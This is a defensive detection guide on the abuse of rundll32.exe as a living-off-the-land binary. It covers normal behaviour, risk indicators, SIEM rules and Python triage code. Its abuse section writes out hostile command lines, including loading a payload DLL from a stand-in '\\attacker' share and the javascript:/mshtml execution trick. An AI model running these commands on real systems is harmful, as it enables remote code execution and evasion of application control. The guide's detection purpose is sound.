rundll32.exe (System Utility) - LOLBin Security Analysis & Detection Guide
rundll32.exe is a Windows utility for executing DLL functions from the command line. It is one of the **most frequently abused Living-off-the-Land Binaries (LOLBins)** for executing malicious code, bypassing application controls, and defense evasion. Command-line analysis is essential for detecting abuse.
Risk Summary
HIGH priority for SOC triage. rundll32.exe is a **top-tier LOLBin** abused by virtually all threat actor categories. Focus on: unusual DLL paths, JavaScript execution, network connections, and encoded parameters.
Overview
What is rundll32.exe?
rundll32.exe is a Windows system utility designed to execute functions exported by DLL files.
Syntax:
rundll32.exe DLLname,EntryPoint [arguments]
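To make the `DLLname,EntryPoint [arguments]` syntax concrete, here is a small parser that splits a rundll32 command line into its image, DLL, entry point and arguments, and buckets the DLL by where it would be loaded from. This is an added example, not code from the original page. The tokenization (quoted DLL paths honoured; an unquoted DLL name ends at the first comma or space; a comma or spaces may separate DLL and entry point) approximates rundll32's own behaviour and is an assumption, as are the `SYSTEM_DIRS` and `USER_WRITABLE_MARKERS` lists. Environment variables such as `%TEMP%` are not expanded.

```python
# Assumed directory lists for illustration; not taken from the original page.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
USER_WRITABLE_MARKERS = ("\\temp\\", "\\downloads\\", "\\appdata\\", "\\users\\public\\")


def _read_token(text, stop_at_comma):
    """Read one token from the front of text and return (token, remainder).

    A token starting with a double quote runs to the closing quote (spaces and
    commas inside are kept); otherwise it runs to the next whitespace, or also
    to the next comma when stop_at_comma is set. This approximates how
    rundll32 separates the DLL name from the entry point (assumption).
    """
    text = text.lstrip()
    if not text:
        return "", ""
    if text[0] == '"':
        end = text.find('"', 1)
        if end == -1:
            return text[1:], ""
        return text[1:end], text[end + 1:]
    i = 0
    while i < len(text) and not text[i].isspace():
        if stop_at_comma and text[i] == ",":
            break
        i += 1
    return text[:i], text[i:]


def classify_dll_location(dll):
    """Bucket the DLL spec by where it would be loaded from."""
    d = dll.lower()
    if d.startswith("javascript:"):
        return "protocol"        # not a DLL at all: the javascript: pseudo-protocol
    if d.startswith("\\\\"):
        return "unc"             # remote share
    if "\\" not in d and ":" not in d:
        return "bare-name"       # resolved through the DLL search order, e.g. shell32.dll
    if any(d.startswith(s) for s in SYSTEM_DIRS):
        return "system"
    if any(m in d for m in USER_WRITABLE_MARKERS):
        return "user-writable"
    return "other"


def parse_rundll32(command_line):
    """Split a rundll32 command line into image, DLL, entry point and arguments."""
    image, rest = _read_token(command_line, stop_at_comma=False)
    if not image.lower().endswith("rundll32.exe"):
        raise ValueError("not a rundll32 command line: %r" % command_line)
    dll, rest = _read_token(rest, stop_at_comma=True)
    rest = rest.lstrip()
    if rest.startswith(","):
        rest = rest[1:]
    entry_point, rest = _read_token(rest, stop_at_comma=False)
    return {
        "image": image,
        "dll": dll,
        "entry_point": entry_point,
        "arguments": rest.strip(),
        "dll_location": classify_dll_location(dll),
    }


if __name__ == "__main__":
    # Constructed sample command lines: the page's legitimate examples plus a
    # quoted vendor path; nothing here was captured from a real host.
    for line in (
        "rundll32.exe shell32.dll,Control_RunDLL",
        "rundll32.exe printui.dll,PrintUIEntry /in",
        '"C:\\Windows\\System32\\rundll32.exe" "C:\\Program Files\\Vendor\\helper.dll",Run /quiet',
    ):
        print(parse_rundll32(line))
```

The `dll_location` bucket is what an analyst wants first: `bare-name` and `system` are the normal shapes for the legitimate examples on this page, while `user-writable`, `unc` and `protocol` correspond directly to the high-risk indicators listed further down.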
Legitimate Uses
- Launching Control Panel applets
- System configuration functions
- Shell extensions
- Printer management
Security Significance
- Ubiquity: Present on every Windows system
- Flexibility: Can load and execute arbitrary DLL code
- Trust: Often allowlisted by application control
- LOLBin: Extensively documented in LOLBAS project
Appears in nearly every major threat report.
Normal Behavior
Expected Process State
| Property | Expected Value |
|---|---|
| Path | C:\Windows\System32\rundll32.exe |
| Path (32-bit) | C:\Windows\SysWOW64\rundll32.exe |
| Parent | explorer.exe, svchost.exe, msiexec.exe |
| Lifetime | Short-lived (exits after task) |
| Network | Unusual for most use cases |
| User | Typically user context |
Legitimate Command Examples
rundll32.exe shell32.dll,Control_RunDLL
rundll32.exe user32.dll,LockWorkStation
rundll32.exe printui.dll,PrintUIEntry
Common Locations
C:\Windows\System32\rundll32.exe
C:\Windows\SysWOW64\rundll32.exe
Suspicious Indicators
Legitimate vs Suspicious
LEGITIMATE
- DLL Path: System32, well-known DLLs
- Parent: explorer.exe, svchost.exe
- Lifetime: Short-lived
- Network: None
- Command: Recognizable functions
SUSPICIOUS
- DLL Path: Temp, Downloads, User profiles
- Protocol: javascript:, file://
- Command: Base64, encoded parameters
- Network: Outbound connections
- Lifetime: Long-running
- Children: cmd.exe, powershell.exe
High-Risk Indicators
| Indicator | Risk Level |
|---|---|
| DLL from Temp/Downloads | CRITICAL |
| javascript: protocol | CRITICAL |
| Network connections | HIGH |
| Encoded command line | HIGH |
| Long-running process | MEDIUM |
Abuse Techniques
Technique #1: Malicious DLL Execution (T1218.011)
rundll32.exe C:\Users\Public\evil.dll,DllMain
rundll32.exe \\attacker\share\payload.dll,Run
Technique #2: JavaScript Execution
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication"
Technique #3: Application Control Bypass
Using rundll32 to load a malicious DLL placed in a directory that application control already allows, so the policy's trust in rundll32 and in the path carries over to the payload.
Technique #4: Signed DLL Abuse
rundll32.exe advpack.dll,LaunchINFSection
rundll32.exe ieadvpack.dll,LaunchINFSection
rundll32.exe setupapi.dll,InstallHinfSection
Real-World Abuse
Used by: Emotet, TrickBot, Qakbot, APT28, APT29, Cobalt Strike
Detection Guidance
Priority #1: Command-Line Analysis
SIEM Rule:
Process = "rundll32.exe" AND
CommandLine MATCHES "(Temp|Downloads|Users|AppData)"
→ ALERT: HIGH
Priority #2: JavaScript Detection
Process = "rundll32.exe" AND
CommandLine CONTAINS "javascript:"
→ ALERT: CRITICAL
Priority #3: Network Monitoring
Process = "rundll32.exe" AND
NetworkConnection = True
→ ALERT: HIGH
Priority #4: Child Process Monitoring
Parent = "rundll32.exe" AND
Child IN ("cmd.exe", "powershell.exe")
→ ALERT: HIGH
Remediation Steps
- Capture full command line and process tree
- Identify and analyze the DLL
- Check network connections
- Remove malicious files
- Search for persistence mechanisms
Investigation Checklist
- Capture full command-line arguments
- Verify rundll32 path (System32 or SysWOW64)
- Analyze DLL location and signature
- Check for network connections
- Review parent process
- Look for javascript: protocol abuse
- Check for encoded parameters
- Monitor child processes
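The four detection rules in the Detection Guidance section and the path, encoded-parameter and child-process items of this checklist can be run as one triage pass over process-creation telemetry. The following is an added example, not code from the original page: it applies the page's rules to constructed, Sysmon-style events (simplified to `image`, `command_line`, `network_connection` and `children` fields) and reports a severity per event using the page's CRITICAL/HIGH levels. The base64-run heuristic for "encoded parameters" and its 40-character threshold are assumptions; the sample events are constructed, not real telemetry.

```python
import re

# Expected image locations (from the Normal Behavior table).
EXPECTED_IMAGE_PATHS = {
    "c:\\windows\\system32\\rundll32.exe",
    "c:\\windows\\syswow64\\rundll32.exe",
}
# Priority #1 pattern exactly as stated in the SIEM rule.
SUSPICIOUS_PATH_RE = re.compile(r"(Temp|Downloads|Users|AppData)", re.IGNORECASE)
# Priority #4 child processes.
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe"}
# "Encoded parameters" heuristic: a long unbroken run of base64 alphabet
# characters. The threshold of 40 is an assumption, not from the page.
BASE64_RUN_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
SEVERITY_RANK = {"NONE": 0, "MEDIUM": 1, "HIGH": 2, "CRITICAL": 3}


def triage_rundll32(event):
    """Return (severity, reason) findings for one rundll32 process-creation event."""
    findings = []
    image = event.get("image", "")
    cmd = event.get("command_line", "")
    # Checklist: verify the image really is the System32/SysWOW64 binary.
    if image.lower() not in EXPECTED_IMAGE_PATHS:
        findings.append(("HIGH", "rundll32 image outside System32/SysWOW64: " + image))
    # Priority #2: javascript: protocol.
    if "javascript:" in cmd.lower():
        findings.append(("CRITICAL", "javascript: protocol in command line"))
    # Priority #1: DLL referenced from a user-writable location.
    if SUSPICIOUS_PATH_RE.search(cmd):
        findings.append(("HIGH", "command line references Temp/Downloads/Users/AppData"))
    # Checklist: encoded parameters.
    if BASE64_RUN_RE.search(cmd):
        findings.append(("HIGH", "long base64-like token in command line"))
    # Priority #3: network activity from rundll32.
    if event.get("network_connection"):
        findings.append(("HIGH", "process made a network connection"))
    # Priority #4: shell children.
    shells = sorted(c for c in event.get("children", ()) if c.lower() in SUSPICIOUS_CHILDREN)
    if shells:
        findings.append(("HIGH", "spawned " + ", ".join(shells)))
    return findings


def overall_severity(findings):
    """Highest severity among the findings, or NONE when there are none."""
    return max((sev for sev, _ in findings), key=SEVERITY_RANK.__getitem__, default="NONE")


def triage_all(events):
    """Map event id -> overall severity for a batch of events."""
    return {e["id"]: overall_severity(triage_rundll32(e)) for e in events}


SYS32 = "C:\\Windows\\System32\\rundll32.exe"
TEMP_COPY = "C:\\Users\\alice\\AppData\\Local\\Temp\\rundll32.exe"

# Constructed sample events (simplified Sysmon-style fields); not real telemetry.
SAMPLE_EVENTS = [
    {"id": "legit-control-panel", "image": SYS32,
     "command_line": SYS32 + " shell32.dll,Control_RunDLL",
     "network_connection": False, "children": []},
    {"id": "public-dll", "image": SYS32,
     "command_line": SYS32 + " C:\\Users\\Public\\evil.dll,DllMain",
     "network_connection": True, "children": ["cmd.exe"]},
    {"id": "javascript-protocol", "image": SYS32,
     "command_line": SYS32 + ' javascript:"\\..\\mshtml,RunHTMLApplication"',
     "network_connection": False, "children": []},
    {"id": "encoded-args", "image": SYS32,
     "command_line": SYS32 + " C:\\ProgramData\\helper.dll,Run " + "QUFB" * 15,  # base64 filler
     "network_connection": False, "children": []},
    {"id": "relocated-image", "image": TEMP_COPY,
     "command_line": TEMP_COPY + " helper.dll,Run",
     "network_connection": False, "children": []},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        found = triage_rundll32(ev)
        print(ev["id"], overall_severity(found), found)
```

Two tuning points follow from running this on the samples: the Priority #1 pattern matches any `C:\Users\...` path, so per-user installed software that legitimately loads its own DLLs through rundll32 will alert at HIGH until an allowlist of known DLL paths and signers is layered on; and the base64 heuristic only catches long unbroken runs, so it should be treated as a triage hint rather than a standalone rule.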